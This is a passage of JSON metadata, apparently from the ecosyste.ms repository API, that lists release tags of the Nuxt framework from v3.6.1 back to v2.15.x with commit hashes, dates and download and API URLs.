xt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","s